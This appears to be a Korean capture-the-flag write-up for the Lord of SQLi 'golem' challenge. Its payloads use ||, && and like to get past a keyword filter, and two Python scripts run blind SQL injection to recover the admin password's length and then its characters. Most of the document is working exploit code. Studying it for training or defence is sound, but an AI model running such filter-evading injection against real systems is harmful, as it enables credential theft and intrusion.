prob, _, ., () 필터링
or, and, substr(, = 필터링
1. pw length 구하기
= 대신 like를 사용했다.
' || id like 'admin' && length(pw) like 1#
import requests

# Step 1: recover the length of `pw`.
# The page echoes "Hello admin" only when the injected predicate is true, so
# every request leaks exactly one boolean (is length(pw) equal to the guess?).
# The challenge blacklists `or`, `and`, `=` and `substr(`; the logically
# equivalent `||`, `&&` and `like` pass the filter, which is why keyword
# blacklisting is no substitute for a parameterised query on the server side.
# From a monitoring point of view this loop is a burst of near-identical GETs
# whose only varying part is one numeric literal inside the query string.
session_cookie = {"PHPSESSID": ""}  # the logged-in PHPSESSID goes here
length = 1
found = False
while not found:
    probe = f"https://los.rubiya.kr/chall/golem_4b5202cfedd8160e73124b5234235ef5.php?pw=%27%20%7C%7C%20id%20like%20%27admin%27%20%26%26%20length(pw)%20like%20{length}%23"
    reply = requests.get(probe, cookies=session_cookie)
    found = "Hello admin" in reply.text
    if found:
        print('pw length : ', length)
    else:
        length += 1
2. pw 하나하나 구하기
' || id like 'admin' && right(left(pw, 1),1) like char(c)
import requests

# Step 2: recover `pw` one character at a time (the length found in step 1
# was 8, hence positions 1..8).  `right(left(pw, i), 1)` isolates the i-th
# character without using the filtered `substr(`, and `char(c)` avoids
# quoting the candidate.  Candidates 48..122 cover digits, upper- and
# lower-case ASCII letters.  Each position costs at most 75 requests, which is
# the same one-bit-per-request oracle as the length probe above.
session_cookie = {'PHPSESSID': ''}
password = ""
for position in range(1, 9):
    # Lazily issue requests in candidate order and stop at the first match,
    # exactly like a loop with `break`; `None` means no candidate matched.
    hit = next(
        (
            code
            for code in range(48, 123)
            if 'Hello admin' in requests.get(
                f"https://los.rubiya.kr/chall/golem_4b5202cfedd8160e73124b5234235ef5.php?pw=%27%20%7C%7C%20id%20like%20%27admin%27%20%26%26%20right(left(pw%2C{position})%2C1)%20like%20char({code})%23",
                cookies=session_cookie,
            ).text
        ),
        None,
    )
    if hit is None:
        continue
    password += chr(hit)
    print(password)